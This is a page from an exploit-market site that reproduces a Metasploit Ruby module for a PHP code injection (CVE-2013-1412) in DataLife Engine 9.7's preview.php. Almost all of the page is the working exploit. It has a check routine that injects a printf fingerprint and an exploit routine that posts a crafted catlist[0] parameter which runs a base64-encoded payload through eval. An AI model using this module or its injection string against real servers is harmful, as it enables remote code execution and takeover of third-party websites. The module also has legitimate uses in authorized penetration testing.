[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DataLife Engine preview.php PHP Code Injection

Author
metasploit
Risk
[
Security Risk High
]
0day-ID
0day-ID-20273
Category
remote exploits
Date add
01-02-2013
CVE
Platform
php
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
 
    include Msf::Exploit::Remote::HttpClient
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'DataLife Engine preview.php PHP Code Injection',
            'Description'    => %q{
                    This module exploits a PHP code injection vulnerability DataLife Engine 9.7.
                The vulnerability exists in preview.php, due to an insecure usage of preg_replace()
                with the e modifier, which allows to inject arbitrary php code, when the template
                in use contains a [catlist] or [not-catlist] tag.
            },
            'Author'         =>
                [
                    'EgiX', # Vulnerability discovery
                    'juan vazquez' # Metasploit module
                ],
            'License'        => MSF_LICENSE,
            'References'     =>
                [
                    [ 'CVE', '2013-1412' ],
                    [ 'BID', '57603' ],
                    [ 'EDB', '24438' ],
                    [ 'URL', 'http://karmainsecurity.com/KIS-2013-01' ],
                    [ 'URL', 'http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html' ]
                ],
            'Privileged'     => false,
            'Platform'       => ['php'],
            'Arch'           => ARCH_PHP,
            'Payload'        =>
                {
                    'Keys'   => ['php']
                },
            'DisclosureDate' => 'Jan 28 2013',
            'Targets'        => [ ['DataLife Engine 9.7', { }], ],
            'DefaultTarget'  => 0
            ))
 
        register_options(
            [
                OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
            ], self.class)
    end
 
    def uri
        normalize_uri(target_uri.path, 'engine', 'preview.php')
    end
 
    def check
        fingerprint = rand_text_alpha(4+rand(4))
        res = send_request_cgi(
            {
                'uri'       =>  uri,
                'method'    => 'POST',
                'vars_post' =>
                    {
                        'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//"
                    }
            })
 
        if res and res.code == 200 and res.body =~ /#{fingerprint}/
            return Exploit::CheckCode::Vulnerable
        else
            return Exploit::CheckCode::Safe
        end
    end
 
    def exploit
        @peer = "#{rhost}:#{rport}"
 
        print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code")
        res = send_request_cgi(
            {
                'uri'       =>  uri,
                'method'    => 'POST',
                'vars_post' =>
                    {
                        'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//"
                    }
            })
    end
end

#  0day.today [2024-12-26]  #